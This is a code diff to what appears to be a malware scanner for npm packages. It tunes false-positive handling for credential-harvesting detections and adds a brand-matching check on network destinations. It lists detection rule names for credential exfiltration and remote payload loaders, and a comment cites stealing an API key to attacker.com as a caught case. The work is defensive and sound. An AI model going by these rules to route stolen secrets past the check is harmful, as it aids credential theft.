+ 'function_constructor_require', 'staged_remote_loader', 'staged_eval_decode',
1064
+ 'fetch_decrypt_exec', 'download_exec_binary', 'self_destruct_eval',
1065
+ 'newsletter_auto_follow', 'cross_file_dataflow', 'intent_credential_exfil',
1066
+ 'intent_command_exfil', 'sandbox_known_exfil_domain', 'sandbox_network_after_sensitive_read'
1067
+ ]);
1068
+ function _hasProvenExfilSink(threats) {
1069
+ if (!Array.isArray(threats)) return false;
1070
+ return threats.some(t => PROVEN_EXFIL_SINK_TYPES.has(t.type) && t.severity !== 'LOW');
1071
+ }
1072
+
1054
1073
  function applyFPReductions(threats, reachableFiles, packageName, packageDeps, reachableFunctions) {
1055
1074
  // Initialize reductions audit trail on each threat
1056
1075
  // Store original severity before any FP reductions, so compound
@@ -1196,7 +1215,7 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
1196
1215
  }
1197
1216
  }
1198
1217
 
1199
- // FPR sink-coupling gate (chantier 2026-06 — FPR-baseline-2026-06-14.md). credential_regex_harvest
1218
+ // FPR sink-coupling gate (chantier FPR 2026-06). credential_regex_harvest
1200
1219
  // is a weak signal alone: a credential-shaped regex co-located with a network call, with NO proof
1201
1220
  // the matched secret flows out and NO host-reputation check (ast.js:hasCredentialInsideRegex +
1202
1221
  // hasNetworkCallInFile). The blind FPR baseline measured 94.4% FP on it — it fires on nodemailer
@@ -1206,13 +1225,23 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
1206
1225
  // taint ...). When no such sink is present, downgrade HIGH/CRITICAL → LOW. Runs after the dilution
1207
1226
  // floor so the floor's restored instance is also gated (the floor protects real exfil; with no sink
1208
1227
  // there is nothing to protect). No GT sample relies on credential_regex_harvest (verified).
1209
- if (!_hasExfilSink(threats)) {
1210
- for (const t of threats) {
1211
- if (t.type === 'credential_regex_harvest' && (t.severity === 'HIGH' || t.severity === 'CRITICAL')) {
1212
- t.reductions.push({ rule: 'sink_coupling', from: t.severity, to: 'LOW' });
1213
- t.severity = 'LOW';
1214
- }
1228
+ // Sink-coupling for credential_regex_harvest (per-instance, two-way): a proven taint /
1229
+ // structural-malice sink keep HIGH (anti-FN floor); no exfil sink at all ⇒ LOW.
1230
+ const _crhProvenSink = _hasProvenExfilSink(threats);
1231
+ const _crhAnySink = _hasExfilSink(threats);
1232
+ for (const t of threats) {
1233
+ if (t.type !== 'credential_regex_harvest') continue;
1234
+ if (t.severity !== 'HIGH' && t.severity !== 'CRITICAL') continue;
1235
+ // (1) anti-FN floor: a proven taint / structural-malice sink ⇒ keep HIGH (host/flag irrelevant).
1236
+ if (_crhProvenSink) continue;
1237
+ // (2) no exfil sink at all ⇒ LOW (legacy behavior, flag-independent).
1238
+ if (!_crhAnySink) {
1239
+ t.reductions.push({ rule: 'sink_coupling', from: t.severity, to: 'LOW' });
1240
+ t.severity = 'LOW';
1241
+ continue;
1215
1242
  }
1243
+ // (3) only host-reputation sink(s) co-occur ⇒ keep HIGH (fall-through). A host-coupling
1244
+ // downgrade here (gate #3, MUADDIB_CRH_HOST_GATE) was measured inert and removed 2026-06-15.
1216
1245
  }
1217
1246
 
1218
1247
  for (const t of threats) {
@@ -88,7 +88,7 @@ function extractDomain(url) {
88
88
  // Capture only valid hostname characters so a path-less URL immediately followed by
89
89
  // a quote/paren (e.g. fetch('https://api.openai.com')) does not absorb the trailing
90
90
  // ')" into the host. Stops at /, :, ?, #, quotes, parens, etc.
91
- const match = url.match(/^https?:\/\/([a-zA-Z0-9.\-]+)/i);
91
+ const match = url.match(/^https?:\/\/([a-zA-Z0-9.-]+)/i);
92
92
  return match ? match[1].toLowerCase() : null;
93
93
  } catch {
94
94
  return null;
@@ -308,6 +308,45 @@ function networkDestinationsAllBenign(fileContent) {
308
308
  return true;
309
309
  }
310
310
 
311
+ /**
312
+ * Gate #1 variant of networkDestinationsAllBenign: a host ALSO passes if one of its labels
313
+ * matches a credential env-var BRAND (e.g. YINGDAO_ACCESS_TOKEN → api.yingdao.com). This covers
314
+ * the dominant credential→own-API FP cluster (Étape 0 2026-06-15: ~25% of band 20-49, 0 TP) that
315
+ * networkDestinationsAllBenign rejects because a package's own domain is not a curated provider.
316
+ * Decoy-safe by construction: EVERY host must be local/reserved OR a curated provider OR
317
+ * brand-coherent; any unknown / public-IP / suspicious-tunnel host ⇒ false. No hosts ⇒ false.
318
+ * Brand coherence is not attacker-spoofable for the credential-theft case: stealing a VICTIM's
319
+ * OTHER-service key (OPENAI_API_KEY) and sending it to attacker.com yields brand "openai" vs label
320
+ * "attacker" ⇒ mismatch ⇒ keeps firing.
321
+ *
322
+ * @param {string} fileContent - source of the file containing the network sink
323
+ * @param {string[]} brands - brand tokens extracted from the credential env-var names
324
+ * @returns {boolean}
325
+ */
326
+ function networkDestinationsAllBenignOrBrand(fileContent, brands) {
327
+ const hosts = extractHostsFromContent(fileContent);
328
+ if (hosts.length === 0) return false;
329
+ // RFC 2606 / 6761 documentation & test placeholders (example.com/.net/.org, *.test, *.invalid)
330
+ // are NOT real SDK destinations — no benign SDK ships a live credential flow to example.com.
331
+ // A credential→placeholder flow is either a synthetic exfil sample or an evasion stand-in, so it
332
+ // must keep firing (it is deliberately NOT in the local-IPC benign class, unlike loopback/RFC1918).
333
+ const DOC_DOMAIN_RE = /(^|\.)example\.(?:com|net|org)$|\.(?:test|example|invalid)$/i;
334
+ const brandSet = (brands || [])
335
+ .map(b => String(b || '').toLowerCase())
336
+ .filter(b => b.length >= 3);
337
+ for (const h of hosts) {
338
+ if (SUSPICIOUS_DOMAIN_PATTERNS.test(h)) return false;
339
+ if (isPublicIpHost(h)) return false;
340
+ if (DOC_DOMAIN_RE.test(h)) return false;
341
+ if (isLocalOrReservedHost(h)) continue;
342
+ if (PROVIDER_DOMAIN_SUFFIXES.some(s => domainMatchesSuffix(h, [s]))) continue;
343
+ const labels = String(h).toLowerCase().split('.');
344
+ if (brandSet.length && labels.some(l => brandSet.includes(l))) continue;
345
+ return false; // unknown / unrecognised destination → keep firing
346
+ }
347
+ return true;
348
+ }
349
+
311
350
  module.exports = {
312
351
  SDK_ENV_DOMAIN_MAP,
313
352
  ENV_NOISE_TOKENS,
@@ -320,6 +359,7 @@ module.exports = {
320
359
  extractDomain,
321
360
  domainMatchesSuffix,
322
361
  isSDKPattern,
362
+ networkDestinationsAllBenignOrBrand,
323
363
  stripPort,
324
364
  isLocalOrReservedHost,
325
365
  isPublicIpHost,